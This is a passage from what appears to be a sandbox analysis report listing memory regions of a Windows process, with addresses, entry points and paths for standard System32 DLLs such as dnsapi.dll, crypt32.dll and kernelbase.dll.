(normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1418 start_va = 0x7ffd44b00000 end_va = 0x7ffd44b0dfff monitored = 0 entry_point = 0x7ffd44b01460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1419 start_va = 0x7ffd44b10000 end_va = 0x7ffd44b2efff monitored = 0 entry_point = 0x7ffd44b14960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1420 start_va = 0x7ffd44b30000 end_va = 0x7ffd44b44fff monitored = 0 entry_point = 0x7ffd44b32dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1421 start_va = 0x7ffd44b50000 end_va = 0x7ffd44b5bfff monitored = 0 entry_point = 0x7ffd44b52830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 1422 start_va = 0x7ffd45150000 end_va = 0x7ffd4515ffff monitored = 0 entry_point = 0x7ffd45151700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 1423 start_va = 0x7ffd45160000 end_va = 0x7ffd45168fff monitored = 0 entry_point = 0x7ffd45161ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 1424 start_va = 0x7ffd45170000 end_va = 0x7ffd4519cfff monitored = 0 entry_point = 0x7ffd45172290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 1425 start_va = 0x7ffd451a0000 end_va = 0x7ffd451f1fff monitored = 0 entry_point = 0x7ffd451a38e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 1426 start_va = 0x7ffd452a0000 end_va = 0x7ffd452b4fff monitored = 0 entry_point = 0x7ffd452a3460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1427 start_va = 0x7ffd45390000 end_va = 0x7ffd45429fff monitored = 0 entry_point = 0x7ffd453aada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1428 start_va = 0x7ffd45440000 end_va = 0x7ffd454a6fff monitored = 0 entry_point = 0x7ffd454463e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1429 start_va = 0x7ffd45500000 end_va = 0x7ffd455bffff monitored = 0 entry_point = 0x7ffd4552fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1430 start_va = 0x7ffd455c0000 end_va = 0x7ffd4566dfff monitored = 0 entry_point = 0x7ffd455d80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 1431 start_va = 0x7ffd45670000 end_va = 0x7ffd45681fff monitored = 0 entry_point = 0x7ffd45679260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 1432 start_va = 0x7ffd45690000 end_va = 0x7ffd45740fff monitored = 0 entry_point = 0x7ffd457088b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 1433 start_va = 0x7ffd45750000 end_va = 0x7ffd4575afff monitored = 0 entry_point = 0x7ffd45751d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1434 start_va = 0x7ffd45760000 end_va = 0x7ffd45784fff monitored = 0 entry_point = 0x7ffd45772f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 1435 start_va = 0x7ffd45790000 end_va = 0x7ffd457a0fff monitored = 0 entry_point = 0x7ffd45797ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 1436 start_va = 0x7ffd458a0000 end_va = 0x7ffd458b9fff monitored = 0 entry_point = 0x7ffd458a2cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 1437 start_va = 0x7ffd458c0000 end_va = 0x7ffd45914fff monitored = 0 entry_point = 0x7ffd458c3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1438 start_va = 0x7ffd45920000 end_va = 0x7ffd45956fff monitored = 0 entry_point = 0x7ffd45926020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 1439 start_va = 0x7ffd45960000 end_va = 0x7ffd4597ffff monitored = 0 entry_point = 0x7ffd459639a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 1440 start_va = 0x7ffd45a10000 end_va = 0x7ffd45a29fff monitored = 0 entry_point = 0x7ffd45a12430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1441 start_va = 0x7ffd45a30000 end_va = 0x7ffd45a45fff monitored = 0 entry_point = 0x7ffd45a319f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1442 start_va = 0x7ffd45aa0000 end_va = 0x7ffd45ae0fff monitored = 0 entry_point = 0x7ffd45aa4840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 1443 start_va = 0x7ffd45b60000 end_va = 0x7ffd45b73fff monitored = 0 entry_point = 0x7ffd45b62d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1444 start_va = 0x7ffd45e60000 end_va = 0x7ffd45ef2fff monitored = 0 entry_point = 0x7ffd45e69680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 1445 start_va = 0x7ffd45f60000 end_va = 0x7ffd45f6afff monitored = 0 entry_point = 0x7ffd45f61de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1446 start_va = 0x7ffd460b0000 end_va = 0x7ffd460e7fff monitored = 0 entry_point = 0x7ffd460c8cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1447 start_va = 0x7ffd46190000 end_va = 0x7ffd461a8fff monitored = 0 entry_point = 0x7ffd46194520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1448 start_va = 0x7ffd46650000 end_va = 0x7ffd4665bfff monitored = 0 entry_point = 0x7ffd466514d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 1449 start_va = 0x7ffd46920000 end_va = 0x7ffd469e7fff monitored = 0 entry_point = 0x7ffd469613f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1450 start_va = 0x7ffd469f0000 end_va = 0x7ffd46a50fff monitored = 0 entry_point = 0x7ffd469f4b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1451 start_va = 0x7ffd46a60000 end_va = 0x7ffd46bdbfff monitored = 0 entry_point = 0x7ffd46ab1650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 1452 start_va = 0x7ffd46be0000 end_va = 0x7ffd46beafff monitored = 0 entry_point = 0x7ffd46be1770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 1453 start_va = 0x7ffd46dd0000 end_va = 0x7ffd46eb5fff monitored = 0 entry_point = 0x7ffd46decf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 1454 start_va = 0x7ffd47080000 end_va = 0x7ffd47401fff monitored = 0 entry_point = 0x7ffd470d1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1455 start_va = 0x7ffd47410000 end_va = 0x7ffd47545fff monitored = 0 entry_point = 0x7ffd4743f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1456 start_va = 0x7ffd48640000 end_va = 0x7ffd4874dfff monitored = 0 entry_point = 0x7ffd4868eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 1457 start_va = 0x7ffd48a50000 end_va = 0x7ffd48a66fff monitored = 0 entry_point = 0x7ffd48a55630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1458 start_va = 0x7ffd48af0000 end_va = 0x7ffd48b06fff monitored = 0 entry_point = 0x7ffd48af7520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 1459 start_va = 0x7ffd48b10000 end_va = 0x7ffd48b4dfff monitored = 0 entry_point = 0x7ffd48b1a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1460 start_va = 0x7ffd48b50000 end_va = 0x7ffd48b76fff monitored = 0 entry_point = 0x7ffd48b53bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 1461 start_va = 0x7ffd48b80000 end_va = 0x7ffd48bf9fff monitored = 0 entry_point = 0x7ffd48ba7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1462 start_va = 0x7ffd48c00000 end_va = 0x7ffd48c12fff monitored = 0 entry_point = 0x7ffd48c057f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1463 start_va = 0x7ffd48c20000 end_va = 0x7ffd48c74fff monitored = 0 entry_point = 0x7ffd48c2fc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1464 start_va = 0x7ffd48c80000 end_va = 0x7ffd48cadfff monitored = 0 entry_point = 0x7ffd48c87550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1465 start_va = 0x7ffd48cb0000 end_va = 0x7ffd48cc5fff monitored = 0 entry_point = 0x7ffd48cb1b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1466 start_va = 0x7ffd48cd0000 end_va = 0x7ffd48d33fff monitored = 0 entry_point = 0x7ffd48ce5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1467 start_va = 0x7ffd48d80000 end_va = 0x7ffd48e11fff monitored = 0 entry_point = 0x7ffd48dca780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1468 start_va = 0x7ffd49080000 end_va = 0x7ffd4908ffff monitored = 0 entry_point = 0x7ffd49082c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 1469 start_va = 0x7ffd49090000 end_va = 0x7ffd4909cfff monitored = 0 entry_point = 0x7ffd49092ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 1470 start_va = 0x7ffd490a0000 end_va = 0x7ffd490cefff monitored = 0 entry_point = 0x7ffd490a8910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 1471 start_va = 0x7ffd490d0000 end_va = 0x7ffd4913dfff monitored = 0 entry_point = 0x7ffd490d7f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1472 start_va = 0x7ffd49140000 end_va = 0x7ffd49150fff monitored = 0 entry_point = 0x7ffd49143320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1473 start_va = 0x7ffd49160000 end_va = 0x7ffd491a0fff monitored = 0 entry_point = 0x7ffd49177eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1474 start_va = 0x7ffd491b0000 end_va = 0x7ffd492abfff monitored = 0 entry_point = 0x7ffd491e6df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1475 start_va = 0x7ffd492b0000 end_va = 0x7ffd4936efff monitored = 0 entry_point = 0x7ffd492d1c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1476 start_va = 0x7ffd493a0000 end_va = 0x7ffd493d5fff monitored = 0 entry_point = 0x7ffd493b0070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1477 start_va = 0x7ffd49c30000 end_va = 0x7ffd49c39fff monitored = 0 entry_point = 0x7ffd49c31660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1478 start_va = 0x7ffd49c40000 end_va = 0x7ffd49c57fff monitored = 0 entry_point = 0x7ffd49c45910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1479 start_va = 0x7ffd49c60000 end_va = 0x7ffd49dacfff monitored = 0 entry_point = 0x7ffd49ca3da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1480 start_va = 0x7ffd4a3c0000 end_va = 0x7ffd4a3c7fff monitored = 0 entry_point = 0x7ffd4a3c13e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 1481 start_va = 0x7ffd4a880000 end_va = 0x7ffd4a8f8fff monitored = 0 entry_point = 0x7ffd4a89fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1482 start_va = 0x7ffd4aab0000 end_va = 0x7ffd4af42fff monitored = 0 entry_point = 0x7ffd4aabf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1483 start_va = 0x7ffd4af50000 end_va = 0x7ffd4afb6fff monitored = 0 entry_point = 0x7ffd4af6e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 1484 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1485 start_va = 0x7ffd4b1a0000 end_va = 0x7ffd4b1bbfff monitored = 0 entry_point = 0x7ffd4b1a37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1486 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1487 start_va = 0x7ffd4b3a0000 end_va = 0x7ffd4b3dffff monitored = 0 entry_point = 0x7ffd4b3b1960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 1488 start_va = 0x7ffd4b530000 end_va = 0x7ffd4b556fff monitored = 0 entry_point = 0x7ffd4b537940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1489 start_va = 0x7ffd4b560000 end_va = 0x7ffd4b591fff monitored = 0 entry_point = 0x7ffd4b572340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1490 start_va = 0x7ffd4b5a0000 end_va = 0x7ffd4b5abfff monitored = 0 entry_point = 0x7ffd4b5a2480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1491 start_va = 0x7ffd4b670000 end_va = 0x7ffd4b719fff monitored = 0 entry_point = 0x7ffd4b697910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1492 start_va = 0x7ffd4b720000 end_va = 0x7ffd4b81ffff monitored = 0 entry_point = 0x7ffd4b760f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1493 start_va = 0x7ffd4bae0000 end_va = 0x7ffd4baebfff monitored = 0 entry_point = 0x7ffd4bae2790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1494 start_va = 0x7ffd4baf0000 end_va = 0x7ffd4bb13fff monitored = 0 entry_point = 0x7ffd4baf3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1495 start_va = 0x7ffd4bc90000 end_va = 0x7ffd4bd83fff monitored = 0 entry_point = 0x7ffd4bc9a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1496 start_va = 0x7ffd4bde0000 end_va = 0x7ffd4be28fff monitored = 0 entry_point = 0x7ffd4bdea090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1497 start_va = 0x7ffd4bf00000 end_va = 0x7ffd4bf0bfff monitored = 0 entry_point = 0x7ffd4bf027e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1498 start_va = 0x7ffd4bfe0000 end_va = 0x7ffd4c010fff monitored = 0 entry_point = 0x7ffd4bfe7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1499 start_va = 0x7ffd4c040000 end_va = 0x7ffd4c0b9fff monitored = 0 entry_point = 0x7ffd4c061a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1500 start_va = 0x7ffd4c100000 end_va = 0x7ffd4c133fff monitored = 0 entry_point = 0x7ffd4c11ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1501 start_va = 0x7ffd4c140000 end_va = 0x7ffd4c149fff monitored = 0 entry_point = 0x7ffd4c141830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1502 start_va = 0x7ffd4c250000 end_va = 0x7ffd4c26efff monitored = 0 entry_point = 0x7ffd4c255d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1503 start_va = 0x7ffd4c3c0000 end_va = 0x7ffd4c41bfff monitored = 0 entry_point = 0x7ffd4c3d6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1504 start_va = 0x7ffd4c470000 end_va = 0x7ffd4c486fff monitored = 0 entry_point = 0x7ffd4c4779d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1505 start_va = 0x7ffd4c590000 end_va = 0x7ffd4c59afff monitored = 0 entry_point = 0x7ffd4c5919a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1506 start_va = 0x7ffd4c5d0000 end_va = 0x7ffd4c5f0fff monitored = 0 entry_point = 0x7ffd4c5e0250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 1507 start_va = 0x7ffd4c620000 end_va = 0x7ffd4c659fff monitored = 0 entry_point = 0x7ffd4c628d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1508 start_va = 0x7ffd4c660000 end_va = 0x7ffd4c686fff monitored = 0 entry_point = 0x7ffd4c670aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1509 start_va = 0x7ffd4c770000 end_va = 0x7ffd4c79cfff monitored = 0 entry_point = 0x7ffd4c789d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1510 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1511 start_va = 0x7ffd4c960000 end_va = 0x7ffd4c978fff monitored = 0 entry_point = 0x7ffd4c965e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 1512 start_va = 0x7ffd4c980000 end_va = 0x7ffd4c9a8fff monitored = 0 entry_point = 0x7ffd4c994530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1513 start_va = 0x7ffd4c9b0000 end_va = 0x7ffd4ca48fff monitored = 0 entry_point = 0x7ffd4c9df4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1514 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1515 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1516 start_va = 0x7ffd4cb60000 end_va = 0x7ffd4cb6ffff monitored = 0 entry_point = 0x7ffd4cb656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1517 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1518 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1519 start_va = 0x7ffd4cc80000 end_va = 0x7ffd4ccd4fff monitored = 0 entry_point = 0x7ffd4cc97970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1520 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1521 start_va = 0x7ffd4d330000 end_va = 0x7ffd4d346fff monitored = 0 entry_point = 0x7ffd4d331390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1522 start_va = 0x7ffd4d350000 end_va = 0x7ffd4d516fff monitored = 0 entry_point = 0x7ffd4d3adb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1523 start_va = 0x7ffd4d520000 end_va = 0x7ffd4d5a5fff monitored = 0 entry_point = 0x7ffd4d52d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1524 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1525 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 